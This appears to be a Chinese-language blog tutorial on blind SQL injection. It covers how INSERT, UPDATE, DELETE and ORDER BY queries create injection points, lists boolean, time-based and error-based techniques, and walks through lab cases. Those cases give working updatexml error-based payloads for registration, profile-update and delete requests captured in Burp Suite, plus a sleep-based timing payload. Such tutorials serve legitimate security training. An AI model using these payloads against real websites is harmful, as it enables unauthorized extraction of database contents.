当进行SQL注入时,有很多注入会出现无回显的情况,其中不回显的原因可能是SQL语句查询方式的问题导致,这个时候我们需要用到相关的报错或盲注进行后续操作,同时作为手工注入时,提前了解或预知其SQL语句大概写法也能更好的选择对应的注入语句。
SQL语句
select 查询数据
在网站应用中进行数据显示查询操作
例:select * from news where id=$id
insert 插入数据
在网站应用中进行用户注册添加等操作
例:insert into news(id,url,text) values(2,'x','$t')
delete 删除数据
后台管理里面删除文章删除用户等操作
例:delete from news where id=$id
update 更新数据
会员或后台中心数据同步或缓存等操作
例:update user set pwd='$p' where id=2 and username='admin'
order by 排序数据
一般结合表名或列名进行数据排序操作
例:select * from news order by $id
例:select id,name,price from news order by $order
重点理解:
我们可以通过以上查询方式与网站应用的关系
注入点产生地方或应用猜测到对方的SQL查询方式
SQL注入盲注
盲注就是在注入过程中,获取的数据不能回显至前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个过程称之为盲注。我们可以知道盲注分为以下三类:
- 基于布尔的SQL盲注-逻辑判断
regexp,like,ascii,left,ord,mid- 基于时间的SQL盲注-延时判断
if,sleep- 基于报错的SQL盲注-报错回显
floor,updatexml,extractvalue
https://www.jianshu.com/p/bc35f8dd4f7c使用顺序:3 -> 1 -> 2
参考:
like 'ro%' #判断ro或ro...是否成立
regexp '^xiaodi[a-z]' #匹配xiaodi及xiaodi...等
if(条件,5,0) #条件成立 返回5 反之 返回0
sleep(5) #SQL语句延时执行5秒
mid(a,b,c) #从位置b开始,截取a字符串的c位
substr(a,b,c) #从b位置开始,截取字符串a的c长度
left(database(),1),database() #left(a,b)从左侧截取a的前b位
length(database())=8 #判断数据库database()名的长度
ord=ascii ascii(x)=97 #判断x的ascii码是否等于97
案例
1. insert
-
进行注册,burp抓包
-
发送到repeater
修改数据为
username=1' or updatexml(1, concat(0x7e, database(), 0x7e), 0) or '&password=1&sex=1&phonenum=1&email=1&add=1&submit=submit
2. update
- 注册成功后,登录,点击修改个人信息
- 提交抓包, 发送到repeater
- 修改数据
sex=a' or updatexml(1, concat(0x7e, database(), 0x7e), 0) or '&phonenum=a&add=a&email=a&submit=submit
3. delete
- 随便留言,然后点击删除,抓包
- 修改数据
or updatexml (1,concat(0x7e,datebase()),0)
在BurpSuite中需要进行url编码,将空格改为 + 或20%
可使用 Ctrl+U
4. 时间盲注
if(ascii(substr(database(),1,1))=115,sleep(5),1)--+
如果database()的第一个字符的ascii码值为115,sleep5秒
了解if(a,b,c),sleep(x),substr(),mid(),left()等的使用
4077
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
